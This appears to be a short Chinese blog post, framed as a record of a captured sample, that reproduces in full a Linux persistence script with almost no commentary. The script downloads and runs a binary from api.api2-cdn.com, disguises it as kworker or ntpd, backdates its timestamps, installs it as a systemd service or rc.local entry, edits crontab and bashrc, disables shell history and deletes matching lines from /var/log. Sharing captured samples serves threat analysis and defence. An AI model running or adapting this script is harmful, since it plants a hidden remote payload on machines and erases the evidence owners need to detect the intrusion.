自动化计划任务及服务权限维持样本

前言:项目中抓到了个样本,这边进行简单的记录

os=`uname -a | grep el6`
if [[ $os = '' ]]
then
    id=`sudo -n id` 
    if [[ $id = '' ]]
    then
        chattr -f -i /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        chattr -f -a /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        rm -rf /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q
        chmod +x /var/tmp/kworker
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        /var/tmp/kworker
        bashrc=`cat .bashrc | grep -v kworker`;echo "${bashrc}" > ~/.bashrc
        #echo "atd=\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \$2}'\`;kworker=\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \$2}'\`;if [[ \$atd = '' ]] && [[ \$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi" >> ~/.bashrc
        crontab -l | grep -v "kworker" | crontab
        #(crontab -l;echo "* * * * * bash -c \"atd=\\\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \\\$2}'\\\`;kworker=\\\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \\\$2}'\\\`;if [[ \\\$atd = '' ]] && [[ \\\$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi\"") | crontab
        unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null
    else
        sudo chattr -f -i /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo chattr -f -a /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo mkdir /lib/
        sudo rm -rf /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo wget -qO /lib/ntpd http://api.api2-cdn.com/kworkerps3q || sudo curl -so /lib/ntpd http://api.api2-cdn.com/kworkerps3q
        sudo chmod +x /lib/ntpd
        sudo systemctl -q disable kworker
        sudo rm -rf /lib/systemd/system/kworker.service
        sudo systemctl daemon-reload
        sudo systemctl reset-failed
        sudo systemctl daemon-reload
        sudo bash -c 'cat << EOF > /lib/systemd/system/kworker.service

[Unit]
After=network.target
[Service]
Type=forking
ExecStart=/lib/ntpd
Restart=always
[Install]
WantedBy=multi-user.target
EOF'
        sudo systemctl daemon-reload
        sudo systemctl reset-failed
        sudo systemctl -q enable kworker
        sudo systemctl start kworker
        sudo /lib/ntpd
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        sudo unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/ntpd/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/xfsalloc/d" {} 2>/dev/null'

    fi
else 
    id=`sudo -n id`
    if [[ $id = '' ]]
    then
        chattr -f -i /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        chattr -f -a /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        rm -rf /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q
        chmod +x /var/tmp/kworker
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        /var/tmp/kworker
        bashrc=`cat .bashrc | grep -v kworker`;echo "${bashrc}" > ~/.bashrc
        #echo "atd=\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \$2}'\`;kworker=\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \$2}'\`;if [[ \$atd = '' ]] && [[ \$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi" >> ~/.bashrc
        crontab -l | grep -v "kworker" | crontab
        #(crontab -l;echo "* * * * * bash -c \"atd=\\\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \\\$2}'\\\`;kworker=\\\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \\\$2}'\\\`;if [[ \\\$atd = '' ]] && [[ \\\$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi\"") | crontab
        unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null
    else
        sudo chattr -f -i /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo chattr -f -a /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo rm -rf /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo wget -qO /lib/ntpd http://api.api2-cdn.com/kworkerps3q || sudo curl -so /lib/ntpd http://api.api2-cdn.com/kworkerps3q
        sudo chmod +x /lib/ntpd
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        sudo /lib/ntpd
        sudo sed -i s/\\/usr\\/bin\\/kworker//g /etc/rc.d/rc.local
        sudo sed -i s/\\/lib\\/ntpd//g /etc/rc.d/rc.local
        echo "echo '/lib/ntpd' >> /etc/rc.d/rc.local" | sudo sh
        sudo chmod +x /etc/rc.d/rc.local
        sudo unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/ntpd/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/xfsalloc/d" {} 2>/dev/null'
    fi
fi
posted @ 2024-05-02 12:25  zpchcbd  阅读(30)  评论(0编辑  收藏  举报